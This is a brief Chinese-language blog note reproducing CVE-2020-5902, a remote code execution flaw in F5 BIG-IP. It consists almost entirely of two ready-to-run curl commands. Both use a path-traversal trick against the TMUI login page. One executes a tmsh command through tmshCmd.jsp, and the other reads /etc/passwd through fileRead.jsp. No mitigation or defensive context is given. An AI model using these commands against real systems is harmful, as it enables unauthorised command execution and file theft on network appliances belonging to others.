CVE-2020-5902 F5 BIG-IP 遠程程式碼執行RCE - ⎝⎛CodingNote.cc ⎞⎠

CVE-2020-5902 F5 BIG-IP 遠程程式碼執行RCE

2020 年 7 月 6 日
筆記
漏洞復現

cve-2020-5902 :

RCE:
curl -v -k ‘//[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin’

Read File:
curl -v -k ‘//[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’

原文地址：
//twitter.com/x4ce/status/1279790599793545216

Tags: 漏洞復現

Previous post

性能測試之jmeter邏輯控制種類詳解一

Next post

貨幣金融學（米什金）課程學習筆記